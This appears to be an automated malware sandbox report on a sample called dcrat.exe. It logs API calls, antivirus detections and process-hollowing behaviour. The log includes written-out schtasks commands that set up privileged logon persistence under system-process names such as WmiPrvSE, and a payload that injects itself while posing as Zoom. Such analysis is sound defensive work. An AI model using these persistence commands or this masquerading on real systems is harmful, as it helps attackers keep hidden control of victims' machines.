CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2044 thread_handle: 0x00000390 process_identifier: 192 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003ac	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2760 thread_handle: 0x00000390 process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b4	1	1
CreateProcessInternalW March 17, 2021, 11:04 p.m.	thread_identifier: 2772 thread_handle: 0x00000390 process_identifier: 1812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c0	1	1
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1812	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1812	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 1812	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 1812	1	0
NtGetContextThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread March 17, 2021, 11:04 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 1812	1	0
CreateProcessInternalW March 17, 2021, 11:05 p.m.	thread_identifier: 620 thread_handle: 0x000002b0 process_identifier: 2428 current_directory: filepath: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe track: 1 command_line: "{path}" filepath_r: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002b4	1	1
NtGetContextThread March 17, 2021, 11:05 p.m.	thread_handle: 0x000002b0	1	0
NtAllocateVirtualMemory March 17, 2021, 11:05 p.m.	process_identifier: 2428 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4		3221225496
CreateProcessInternalW March 17, 2021, 11:05 p.m.	thread_identifier: 2988 thread_handle: 0x000002b8 process_identifier: 2164 current_directory: filepath: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe track: 1 command_line: "{path}" filepath_r: C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002c8	1	1
NtGetContextThread March 17, 2021, 11:05 p.m.	thread_handle: 0x000002b8	1	0
NtAllocateVirtualMemory March 17, 2021, 11:05 p.m.	process_identifier: 2164 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002c8	1	0
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL>¦1`à.0^ @ `Kàè H.textd `.sdata\|& (@À.rsrcèà¬@@.reloc²@B base_address: 0x00400000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: base_address: 0x00402000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: base_address: 0x0045a000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: 8Ph à\üãêï»¿<\4VS_VERSION_INFO½ïþ[æ[æ?¼StringFileInfo040904B0Comments`@CompanyNameZoom Video Communications, Inc.,FileDescription@FileVersion5,4,58891,1115, InternalNameZoomnLegalCopyright© Zoom Video Communications, Inc. All rights reserved.4 LegalTrademarksZoom4 OriginalFilenameZoom, ProductNameZoomDProductVersion5,4,58891,1115DVarFileInfo$Translation °ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0045e000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: `? base_address: 0x00460000 process_identifier: 2164 process_handle: 0x000002c8	1	1
WriteProcessMemory March 17, 2021, 11:05 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2164 process_handle: 0x000002c8	1	1

File has been identified by 51 AntiVirus engines on VirusTotal as malicious (50 out of 51 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.36400304
FireEye	Generic.mg.a16225aa2cb7f0c1
CAT-QuickHeal	Trojan.Wacatac
ALYac	Trojan.GenericKD.36400304
Cylance	Unsafe
Zillya	Trojan.GenKryptik.Win32.74871
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	Trojan:MSIL/AgentTesla.75ed4c88
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.a2cb7f
Arcabit	Trojan.Generic.D22B6CB0
Cyren	W32/MSIL_Kryptik.DFR.gen!Eldorado
Symantec	Trojan.Gen.2
APEX	Malicious
Avast	Win32:PWSX-gen [Trj]
Kaspersky	HEUR:Trojan.MSIL.Crypt.gen
BitDefender	Trojan.GenericKD.36400304
NANO-Antivirus	Trojan.Win32.Crypt.inhgxr
Paloalto	generic.ml
ViRobot	Trojan.Win32.Z.Agent.1088512.AH
Tencent	Msil.Trojan.Crypt.Lkde
Ad-Aware	Trojan.GenericKD.36400304
Emsisoft	Trojan.GenericKD.36400304 (B)
DrWeb	Trojan.Packed2.42850
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R002C0DC121
McAfee-GW-Edition	PWS-FCUF!A16225AA2CB7
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Inject
ESET-NOD32	a variant of MSIL/GenKryptik.FCEQ
Avira	TR/Kryptik.zupnk
MAX	malware (ai score=81)
Microsoft	Trojan:MSIL/AgentTesla.AM!MTB
GData	Trojan.GenericKD.36400304
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Gen.RL_Reputation.C4347480
McAfee	PWS-FCUF!A16225AA2CB7
VBA32	TScope.Trojan.MSIL
Malwarebytes	Trojan.Crypt.MSIL.Generic
TrendMicro-HouseCall	TROJ_GEN.R002C0DC121
Rising	Trojan.GenKryptik!8.AA55 (CLOUD)
Yandex	Trojan.Crypt!KhlVnFiWvyg
SentinelOne	Static AI - Malicious PE
Fortinet	MSIL/GenKryptik.FCEQ!tr
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/CI.A
CrowdStrike	win/malicious_confidence_60% (W)

dcrat.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All